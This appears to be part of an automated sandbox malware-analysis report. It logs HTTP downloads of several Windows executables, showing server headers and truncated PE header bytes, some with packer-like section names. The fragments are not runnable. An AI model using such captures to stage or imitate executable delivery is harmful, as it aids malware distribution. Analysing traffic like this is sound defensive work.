0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Feb 2025 06:56:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Feb 2025 06:56:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Feb 2025 06:56:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 02 Feb 2025 06:56:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 02 Feb 2025 06:57:08 GMTContent-Type: application/octet-streamContent-Length: 6501376Last-Modified: Sun, 02 Feb 2025 05:57:42 GMTConnection: keep-aliveETag: "679f0956-633400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 52 54 9b 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d0 47 00 00 c6 69 00 00 32 00 00 00 a0 a1 00 00 10 00 00 00 e0 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 a1 00 00 04 00 00 f2 28 64 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 10 67 00 73 00 00 00 00 00 67 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 c8 69 00 88 06 00 00 90 8c a1 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8c a1 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 66 00 00 10 00 00 00 8c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 00 67 00 00 02 00 00 00 9c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 67 00 00 02 00 00 00 9e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 64 65 63 72 6d 78 68 00 70 3a 00 00 20 67 00 00 6e 3a 00 00 a0 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 63 67 63 70 66 6d 79 00 10 00 00 00 90 a1 00 00 04 00 00 00 0e 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 a1 00 00 22 00 00 00 12 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 02 Feb 2025 06:57:17 GMTContent-Type: application/octet-streamContent-Length: 1884672Last-Modified: Sun, 02 Feb 2025 06:43:07 GMTConnection: keep-aliveETag: "679f13fb-1cc200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 6e 4e 99 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 6a 04 00 00 ae 00 00 00 00 00 00 00 40 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4a 00 00 04 00 00 2d c5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 b0 05 00 00 02 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 61 61 73 63 74 6e 70 00 00 1a 00 00 30 30 00 00 f6 19 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6a 7a 65 6f 77 7a 71 00 10 00 00 00 30 4a 00 00 04 00 00 00 9c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4a 00 00 22 00 00 00 a0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 02 Feb 2025 06:57:22 GMTContent-Type: application/octet-streamContent-Length: 1805824Last-Modified: Fri, 31 Jan 2025 09:36:52 GMTConnection: keep-aliveETag: "679c99b4-1b8e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 40 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 47 00 00 04 00 00 53 b9 1b 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 4c 05 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 66 72 71 63 6f 66 67 00 a0 1a 00 00 80 2c 00 00 9c 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 71 72 66 79 62 62 63 00 20 00 00 00 20 47 00 00 04 00 00 00 68 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 47 00 00 22 00 00 00 6c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 